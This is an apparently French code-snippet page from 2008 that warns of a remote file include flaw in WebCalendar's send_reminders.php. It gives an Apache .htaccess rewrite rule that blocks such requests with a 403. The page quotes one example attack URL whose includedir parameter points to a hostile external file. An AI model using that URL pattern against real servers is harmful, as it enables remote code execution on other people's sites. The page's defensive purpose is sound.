Eviter les attaques par le script send_reminders.php
Information sur le code source
Enregistré le 25 Mai 2008 - Vu 5274 fois
| Votre avis: |
|
| |
[66] sources en Apache voir
|
Description du code source
Informations sur le code source
Votre site est peut-être vulnérable si vous avez WebCalendar. En effet vous risquez d'être victime d'une attaque par inclusion de code externe (remote file include vulnerability). Les url à l'origine de ces hacks sont de la forme :
http://www.example.om/tools/send_reminders.php?includedir=http://www.sitepourri.com/fichier.txt?
Une petite règle dans le fichier .htaccess vous protégera des hackers en retournant une code 403 (accès interdit) à chaque tentative d'accès.
Code Source
.01
.02
.03
.04
.05
.06
.07
.08
.09
.10
.11
.12
.13
.14
.15
.16
.17
.18
.19
.20
.21
.22
.23
.24
|
|
################################################################################
# #
# __ _ __ _ #
# __ ______/ /______ _ ______(_) /_(_)__ ___ _ #
# / // / __/ / __/ -_) |/|/ / __/ / __/ / _ \/ _ `/ #
# \_,_/_/ /_/_/ \__/|__,__/_/ /_/\__/_/_//_/\_, / #
# /___/ #
# #
# #
################################################################################
# #
# Titre : Eviter les attaques par le script send_reminders.php #
# #
# URL : /scripts32-Apache.htm #
# Auteur : admin #
# Date édition : 25 Mai 2008 #
# #
################################################################################
RewriteEngine on
RewriteCond %{QUERY_STRING} ^(.*&)?includedir=http://
RewriteRule ^(.*/)?tools/send_reminders.php - [F,L]
|
Librairie
Langages de programmation
La librairie est ouverte à tous et elle est accès principalement sur les langages Snippets.
Vous trouverez aussi d'autres langages de programmation tel que le CSS, HTML, AJAX, ASP..
Plus de 300 références facilement accessibles. Visiter